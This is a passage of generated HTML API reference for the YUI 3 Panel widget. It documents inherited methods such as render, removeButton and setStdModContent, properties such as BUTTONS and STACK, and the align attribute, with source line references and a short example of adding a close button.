</div>
</li>
<li class="param">
<code class="param-name">opts</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>optional config params. Valid properties are:</p>
<p><ul>
<li>
'broadcast': whether or not the YUI instance and YUI global are notified when the event is fired (false)
</li>
<li>
'bubbles': whether or not this event bubbles (true)
Events can only bubble if emitFacade is true.
</li>
<li>
'context': the default execution context for the listeners (this)
</li>
<li>
'defaultFn': the default function to execute when this event fires if preventDefault was not called
</li>
<li>
'emitFacade': whether or not this event emits a facade (false)
</li>
<li>
'prefix': the prefix for this targets events, e.g., 'menu' in 'menu:click'
</li>
<li>
'fireOnce': if an event is configured to fire once, new subscribers after
the fire will be notified immediately.
</li>
<li>
'async': fireOnce event listeners will fire synchronously if the event has already
fired unless async is true.
</li>
<li>
'preventable': whether or not preventDefault() has an effect (true)
</li>
<li>
'preventedFn': a function that is executed when preventDefault is called
</li>
<li>
'queuable': whether or not this event can be queued during bubbling (false)
</li>
<li>
'silent': if silent is true, debug messages are not provided for this event.
</li>
<li>
'stoppedFn': a function that is executed when stopPropagation is called
</li></p>
<p><li>
'monitored': specifies whether or not this event should send notifications about
when the event has been attached, detached, or published.
</li>
<li>
'type': the event type (valid option if not provided as the first parameter to publish)
</li>
</ul></p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/CustomEvent.html" class="crosslink">CustomEvent</a></span>:
the custom event
</div>
</div>
</div>
<div id="method_removeAttr" class="method item inherited">
<h3 class="name"><code>removeAttr</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>name</code>
</li>
</ul><span class="paren">)</span>
</div>
<div class="meta">
<p>Inherited from
<a href="../classes/AttributeExtras.html#method_removeAttr">AttributeExtras</a>:
<a href="../files/attribute_js_AttributeExtras.js.html#l77"><code>attribute/js/AttributeExtras.js:77</code></a>
</p>
</div>
<div class="description">
<p>Removes an attribute from the host object</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">name</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The name of the attribute to be removed.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method_removeButton" class="method item inherited">
<h3 class="name"><code>removeButton</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>button</code>
</li>
<li class="arg">
<code class="optional">[section="footer"]</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag chainable">chainable</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#method_removeButton">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l418"><code>widget-buttons/js/widget-buttons.js:418</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p>Removes a button from this widget.</p>
<p>The button will be removed from this widget's <code>buttons</code> and its DOM. Any
event subscriptions on the button which were created by this widget will be
detached. If the content section becomes empty after removing the button
node, then the section will also be removed.</p>
<p>This fires the <code>buttonsChange</code> event and adds the following properties to
the event facade:</p>
<ul>
<li><p><code>button</code>: The button node to remove.</p></li>
<li><p><code>section</code>: The <code>WidgetStdMod</code> section (header/body/footer) where the
button should be removed from.</p></li>
<li><p><code>index</code>: The index at which the button exists in the section.</p></li>
<li><p><code>src</code>: "remove"</p></li>
</ul>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">button</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a> | <a href="../classes/Number.html" class="crosslink">Number</a> | <a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The button to remove. This can be a
<code>Y.Node</code> instance, index, or String name of a button.</p>
</div>
</li>
<li class="param">
<code class="param-name optional">[section="footer"]</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>The <code>WidgetStdMod</code> section
(header/body/footer) where the button exists. Only applicable when
removing a button by numerical index, or by name but scoped to a
particular section.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method_removeTarget" class="method item inherited">
<h3 class="name"><code>removeTarget</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>o</code>
</li>
</ul><span class="paren">)</span>
</div>
<div class="meta">
<p>Inherited from
<a href="../classes/EventTarget.html#method_removeTarget">EventTarget</a>:
<a href="../files/event-custom_js_event-facade.js.html#l414"><code>event-custom/js/event-facade.js:414</code></a>
</p>
</div>
<div class="description">
<p>Removes a bubble target</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">o</code>
<span class="type"><a href="../classes/EventTarget.html" class="crosslink">EventTarget</a></span>
<div class="param-description">
<p>the target to remove</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method_render" class="method item inherited">
<h3 class="name"><code>render</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>parentNode</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag final">final</span>
<span class="flag chainable">chainable</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method_render">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l511"><code>widget/js/Widget.js:511</code></a>
</p>
</div>
<div class="description">
<p>Establishes the initial DOM for the widget. Invoking this
method will lead to the creating of all DOM elements for
the widget (or the manipulation of existing DOM elements
for the progressive enhancement use case).</p>
<p>
This method should only be invoked once for an initialized
widget.
</p>
<p>
It delegates to the widget specific renderer method to do
the actual work.
</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">parentNode</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a> | <a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>Optional. The Node under which the
Widget is to be rendered. This can be a Node instance or a CSS selector string. </p>
<p>
If the selector string returns more than one Node, the first node will be used
as the parentNode. NOTE: This argument is required if both the boundingBox and contentBox
are not currently in the document. If it's not provided, the Widget will be rendered
to the body of the current document in this case.
</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method_renderer" class="method item protected inherited">
<h3 class="name"><code>renderer</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method_renderer">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l586"><code>widget/js/Widget.js:586</code></a>
</p>
</div>
<div class="description">
<p>Creates DOM (or manipulates DOM for progressive enhancement)
This method is invoked by render() and is not chained
automatically for the class hierarchy (unlike initializer, destructor)
so it should be chained manually for subclasses if required.</p>
</div>
</div>
<div id="method_renderUI" class="method item protected inherited">
<h3 class="name"><code>renderUI</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method_renderUI">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l620"><code>widget/js/Widget.js:620</code></a>
</p>
</div>
<div class="description">
<p>Adds nodes to the DOM </p>
<p>This method is not called by framework and is not chained
automatically for the class hierarchy.</p>
</div>
</div>
<div id="method_reset" class="method item inherited">
<h3 class="name"><code>reset</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>name</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
</span>
<span class="flag chainable">chainable</span>
<div class="meta">
<p>Inherited from
<a href="../classes/AttributeExtras.html#method_reset">AttributeExtras</a>:
<a href="../files/attribute_js_AttributeExtras.js.html#l87"><code>attribute/js/AttributeExtras.js:87</code></a>
</p>
</div>
<div class="description">
<p>Resets the attribute (or all attributes) to its initial value, as long as
the attribute is not readOnly, or writeOnce.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">name</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>Optional. The name of the attribute to reset. If omitted, all attributes are reset.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>:
A reference to the host object.
</div>
</div>
</div>
<div id="method_set" class="method item inherited">
<h3 class="name"><code>set</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>name</code>
</li>
<li class="arg">
<code>value</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
</span>
<span class="flag chainable">chainable</span>
<div class="meta">
<p>Inherited from
<a href="../classes/AttributeEvents.html#method_set">
AttributeEvents
</a>
but overwritten in
<a href="../files/attribute_js_AttributeCore.js.html#l328"><code>attribute/js/AttributeCore.js:328</code></a>
</p>
</div>
<div class="description">
<p>Sets the value of an attribute.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">name</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The name of the attribute. If the
current value of the attribute is an Object, dot notation can be used
to set the value of a property within the object (e.g. <code>set("x.y.z", 5)</code>).</p>
</div>
</li>
<li class="param">
<code class="param-name">value</code>
<span class="type">Any</span>
<div class="param-description">
<p>The value to set the attribute to.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>:
A reference to the host object.
</div>
</div>
</div>
<div id="method_setAttrs" class="method item inherited">
<h3 class="name"><code>setAttrs</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>attrs</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
</span>
<span class="flag chainable">chainable</span>
<div class="meta">
<p>Inherited from
<a href="../classes/AttributeEvents.html#method_setAttrs">
AttributeEvents
</a>
but overwritten in
<a href="../files/attribute_js_AttributeCore.js.html#l635"><code>attribute/js/AttributeCore.js:635</code></a>
</p>
</div>
<div class="description">
<p>Sets multiple attribute values.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">attrs</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>An object with attributes name/value pairs.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>:
A reference to the host object.
</div>
</div>
</div>
<div id="method_setStdModContent" class="method item inherited">
<h3 class="name"><code>setStdModContent</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>section</code>
</li>
<li class="arg">
<code>content</code>
</li>
<li class="arg">
<code>where</code>
</li>
</ul><span class="paren">)</span>
</div>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStdMod.html#method_setStdModContent">WidgetStdMod</a>:
<a href="../files/widget-stdmod_js_Widget-StdMod.js.html#l668"><code>widget-stdmod/js/Widget-StdMod.js:668</code></a>
</p>
</div>
<div class="description">
<p>Updates the body section of the standard module with the content provided (either an HTML string, or node reference).</p>
<p>
This method can be used instead of the corresponding section content attribute if you'd like to retain the current content of the section,
and insert content before or after it, by specifying the <code>where</code> argument.
</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">section</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The standard module section whose content is to be updated. Either WidgetStdMod.HEADER, WidgetStdMod.BODY or WidgetStdMod.FOOTER.</p>
</div>
</li>
<li class="param">
<code class="param-name">content</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a> | <a href="../classes/Node.html" class="crosslink">Node</a></span>
<div class="param-description">
<p>The content to be added, either an HTML string or a Node reference.</p>
</div>
</li>
<li class="param">
<code class="param-name">where</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>Optional. Either WidgetStdMod.AFTER, WidgetStdMod.BEFORE or WidgetStdMod.REPLACE.
If not provided, the content will replace existing content in the section.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method_show" class="method item inherited">
<h3 class="name"><code>show</code></h3>
<span class="paren">()</span>
<span class="flag chainable">chainable</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method_show">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l652"><code>widget/js/Widget.js:652</code></a>
</p>
</div>
<div class="description">
<p>Shows the Widget by setting the "visible" attribute to "true".</p>
</div>
</div>
<div id="method_sizeShim" class="method item inherited">
<h3 class="name"><code>sizeShim</code></h3>
<span class="paren">()</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStack.html#method_sizeShim">WidgetStack</a>:
<a href="../files/widget-stack_js_Widget-Stack.js.html#l404"><code>widget-stack/js/Widget-Stack.js:404</code></a>
</p>
</div>
<div class="description">
<p>For IE6, synchronizes the size and position of iframe shim to that of
Widget bounding box which it is protecting. For all other browsers,
this method does not do anything.</p>
</div>
</div>
<div id="method_subscribe" class="method item deprecated inherited">
<h3 class="name"><code>subscribe</code></h3>
<span class="paren">()</span>
<span class="flag deprecated" title="use on">deprecated</span>
<div class="meta">
<p>Inherited from
<a href="../classes/EventTarget.html#method_subscribe">EventTarget</a>:
<a href="../files/event-custom_js_event-target.js.html#l334"><code>event-custom/js/event-target.js:334</code></a>
</p>
<p>Deprecated: use on</p>
</div>
<div class="description">
<p>subscribe to an event</p>
</div>
</div>
<div id="method_syncUI" class="method item protected inherited">
<h3 class="name"><code>syncUI</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method_syncUI">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l631"><code>widget/js/Widget.js:631</code></a>
</p>
</div>
<div class="description">
<p>Refreshes the rendered UI, based on Widget State</p>
<p>This method is not called by framework and is not chained
automatically for the class hierarchy.</p>
</div>
</div>
<div id="method_syncXY" class="method item inherited">
<h3 class="name"><code>syncXY</code></h3>
<span class="paren">()</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPosition.html#method_syncXY">WidgetPosition</a>:
<a href="../files/widget-position_js_Widget-Position.js.html#l174"><code>widget-position/js/Widget-Position.js:174</code></a>
</p>
</div>
<div class="description">
<p>Synchronizes the Panel's "xy", "x", and "y" properties with the
Widget's position in the DOM.</p>
</div>
</div>
<div id="method_toString" class="method item inherited">
<h3 class="name"><code>toString</code></h3>
<span class="paren">()</span>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
</span>
<div class="meta">
<p>Inherited from
<a href="../classes/BaseCore.html#method_toString">
BaseCore
</a>
but overwritten in
<a href="../files/widget_js_Widget.js.html#l1105"><code>widget/js/Widget.js:1105</code></a>
</p>
</div>
<div class="description">
<p>Generic toString implementation for all widgets.</p>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>:
The default string value for the widget [ displays the NAME of the instance, and the unique id ]
</div>
</div>
</div>
<div id="method_unsubscribe" class="method item deprecated inherited">
<h3 class="name"><code>unsubscribe</code></h3>
<span class="paren">()</span>
<span class="flag deprecated" title="use detach">deprecated</span>
<div class="meta">
<p>Inherited from
<a href="../classes/EventTarget.html#method_unsubscribe">EventTarget</a>:
<a href="../files/event-custom_js_event-target.js.html#l454"><code>event-custom/js/event-target.js:454</code></a>
</p>
<p>Deprecated: use detach</p>
</div>
<div class="description">
<p>detach a listener</p>
</div>
</div>
<div id="method_unsubscribeAll" class="method item deprecated inherited">
<h3 class="name"><code>unsubscribeAll</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>type</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag deprecated" title="use detachAll">deprecated</span>
<div class="meta">
<p>Inherited from
<a href="../classes/EventTarget.html#method_unsubscribeAll">EventTarget</a>:
<a href="../files/event-custom_js_event-target.js.html#l475"><code>event-custom/js/event-target.js:475</code></a>
</p>
<p>Deprecated: use detachAll</p>
</div>
<div class="description">
<p>Removes all listeners from the specified event. If the event type
is not specified, all listeners from all hosted custom events will
be removed.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">type</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The type, or name of the event</p>
</div>
</li>
</ul>
</div>
</div>
</div>
<div id="properties" class="api-class-tabpanel">
<h2 class="off-left">Properties</h2>
<div id="property__allowAdHocAttrs" class="property item protected inherited">
<h3 class="name"><code>_allowAdHocAttrs</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/BaseCore.html#property__allowAdHocAttrs">BaseCore</a>:
<a href="../files/base_js_BaseCore.js.html#l101"><code>base/js/BaseCore.js:101</code></a>
</p>
</div>
<div class="description">
<p>This property controls whether or not instances of this class should
allow users to add ad-hoc attributes through the constructor configuration
hash.</p>
<p>AdHoc attributes are attributes which are not defined by the class, and are
not handled by the MyClass.<em>NON</em>ATTRS_CFG</p>
</div>
<p><strong>Default:</strong> undefined (false)</p>
</div>
<div id="property__buttonsHandles" class="property item protected inherited">
<h3 class="name"><code>_buttonsHandles</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#property__buttonsHandles">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l225"><code>widget-buttons/js/widget-buttons.js:225</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p>A map of button node <code>_yuid</code> -> event-handle for all button nodes which were
created by this widget.</p>
</div>
</div>
<div id="property__buttonsMap" class="property item protected inherited">
<h3 class="name"><code>_buttonsMap</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#property__buttonsMap">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l235"><code>widget-buttons/js/widget-buttons.js:235</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p>A map of this widget's <code>buttons</code>, both name -> button and
section:name -> button.</p>
</div>
</div>
<div id="property__defaultButton" class="property item protected inherited">
<h3 class="name"><code>_defaultButton</code></h3>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#property__defaultButton">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l245"><code>widget-buttons/js/widget-buttons.js:245</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p>Internal reference to this widget's default button.</p>
</div>
</div>
<div id="property__posAlignUIHandles" class="property item protected inherited">
<h3 class="name"><code>_posAlignUIHandles</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Array" class="crosslink external" target="_blank">Array</a></span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPositionAlign.html#property__posAlignUIHandles">WidgetPositionAlign</a>:
<a href="../files/widget-position-align_js_Widget-PositionAlign.js.html#l222"><code>widget-position-align/js/Widget-PositionAlign.js:222</code></a>
</p>
</div>
<div class="description">
<p>Holds the alignment-syncing event handles.</p>
</div>
<p><strong>Default:</strong> null</p>
</div>
<div id="property__UI_ATTRS" class="property item private inherited">
<h3 class="name"><code>_UI_ATTRS</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#property__UI_ATTRS">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l1247"><code>widget/js/Widget.js:1247</code></a>
</p>
</div>
<div class="description">
<p>The lists of UI attributes to bind and sync for widget's _bindUI and _syncUI implementations</p>
</div>
</div>
<div id="property_BOUNDING_TEMPLATE" class="property item inherited">
<h3 class="name"><code>BOUNDING_TEMPLATE</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#property_BOUNDING_TEMPLATE">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l1143"><code>widget/js/Widget.js:1143</code></a>
</p>
</div>
<div class="description">
<p>Property defining the markup template for bounding box.</p>
</div>
</div>
<div id="property_BUTTONS" class="property item">
<h3 class="name"><code>BUTTONS</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#property_BUTTONS">
WidgetButtons
</a>
but overwritten in
<a href="../files/panel_js_panel.js.html#l49"><code>panel/js/panel.js:49</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p>Collection of predefined buttons mapped from name => config.</p>
<p>Panel includes a "close" button which can be use by name. When the close
button is in the header (which is the default), it will look like: [x].</p>
<p>See <code>addButton()</code> for a list of possible configuration values.</p>
</div>
<p><strong>Default:</strong> {close: {}}</p>
<div class="example">
<h4>Example:</h4>
<div class="example-content">
<pre class="code"><code class="prettyprint">// Panel with close button in header.
var panel = new Y.Panel({
buttons: ['close']
});
// Panel with close button in footer.
var otherPanel = new Y.Panel({
buttons: {
footer: ['close']
}
});
</code></pre>
</div>
</div>
</div>
<div id="property_BUTTONS_TEMPLATE" class="property item inherited">
<h3 class="name"><code>BUTTONS_TEMPLATE</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#property_BUTTONS_TEMPLATE">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l202"><code>widget-buttons/js/widget-buttons.js:202</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p>The HTML template to use when creating the node which wraps all buttons of a
section. By default it will have the CSS class: "yui3-widget-buttons".</p>
</div>
<p><strong>Default:</strong> "<span />"</p>
</div>
<div id="property_CONTENT_TEMPLATE" class="property item inherited">
<h3 class="name"><code>CONTENT_TEMPLATE</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#property_CONTENT_TEMPLATE">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l1133"><code>widget/js/Widget.js:1133</code></a>
</p>
</div>
<div class="description">
<p>Property defining the markup template for content box. If your Widget doesn't
need the dual boundingBox/contentBox structure, set CONTENT_TEMPLATE to null,
and contentBox and boundingBox will both point to the same Node.</p>
</div>
</div>
<div id="property_DEF_PARENT_NODE" class="property item inherited">
<h3 class="name"><code>DEF_PARENT_NODE</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a> | <a href="../classes/Node.html" class="crosslink">Node</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#property_DEF_PARENT_NODE">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l1124"><code>widget/js/Widget.js:1124</code></a>
</p>
</div>
<div class="description">
<p>Default node to render the bounding box to. If not set,
will default to the current document body.</p>
</div>
</div>
<div id="property_DEF_UNIT" class="property item inherited">
<h3 class="name"><code>DEF_UNIT</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#property_DEF_UNIT">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l1116"><code>widget/js/Widget.js:1116</code></a>
</p>
</div>
<div class="description">
<p>Default unit to use for dimension values</p>
</div>
</div>
<div id="property_DEFAULT_BUTTONS_SECTION" class="property item inherited">
<h3 class="name"><code>DEFAULT_BUTTONS_SECTION</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#property_DEFAULT_BUTTONS_SECTION">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l213"><code>widget-buttons/js/widget-buttons.js:213</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p>The default section to render buttons in when no section is specified.</p>
</div>
<p><strong>Default:</strong> Y.WidgetStdMod.FOOTER</p>
</div>
<div id="property_name" class="property item deprecated inherited">
<h3 class="name"><code>name</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<span class="flag deprecated" title="Use this.constructor.NAME">deprecated</span>
<div class="meta">
<p>Inherited from
<a href="../classes/BaseCore.html#property_name">BaseCore</a>:
<a href="../files/base_js_BaseCore.js.html#l197"><code>base/js/BaseCore.js:197</code></a>
</p>
<p>Deprecated: Use this.constructor.NAME</p>
</div>
<div class="description">
<p>The string used to identify the class of this object.</p>
</div>
</div>
<div id="property_STACK" class="property item inherited">
<h3 class="name"><code>STACK</code></h3>
<span class="type">Unknown</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetModality.html#property_STACK">WidgetModality</a>:
<a href="../files/widget-modality_js_Widget-Modality.js.html#l173"><code>widget-modality/js/Widget-Modality.js:173</code></a>
</p>
</div>
<div class="description">
<p>A stack of Y.Widget objects representing the current hierarchy of modal widgets presently displayed on the screen</p>
</div>
</div>
<div id="property_UI_EVENTS" class="property item inherited">
<h3 class="name"><code>UI_EVENTS</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#property_UI_EVENTS">Widget</a>:
<a href="../files/widget_js_WidgetUIEvents.js.html#l52"><code>widget/js/WidgetUIEvents.js:52</code></a>
</p>
</div>
<div class="description">
<p>Map of DOM events that should be fired as Custom Events by the <br />
Widget instance.</p>
</div>
</div>
</div>
<div id="attrs" class="api-class-tabpanel">
<h2 class="off-left">Attributes</h2>
<div id="attr_align" class="attr item inherited">
<a name="config_align"></a>
<h3 class="name"><code>align</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPositionAlign.html#attr_align">WidgetPositionAlign</a>:
<a href="../files/widget-position-align_js_Widget-PositionAlign.js.html#l48"><code>widget-position-align/js/Widget-PositionAlign.js:48</code></a>
</p>
</div>
<div class="description">
<p>The alignment configuration for this widget.</p>
<p>The <code>align</code> attribute is used to align a reference point on the widget, with
the reference point on another <code>Node</code>, or the viewport. The object which
<code>align</code> expects has the following properties:</p>
<ul>
<li><p><strong><code>node</code></strong>: The <code>Node</code> to which the widget is to be aligned. If set to
<code>null</code>, or not provided, the widget is aligned to the viewport.</p></li>
<li><p><strong><code>points</code></strong>: A two element Array, defining the two points on the widget
and <code>Node</code>/viewport which are to be aligned. The first element is the
point on the widget, and the second element is the point on the
<code>Node</code>/viewport. Supported alignment points are defined as static
properties on <code>WidgetPositionAlign</code>.</p></li>
</ul>
</div>
<p><strong>Default:</strong> null</p>
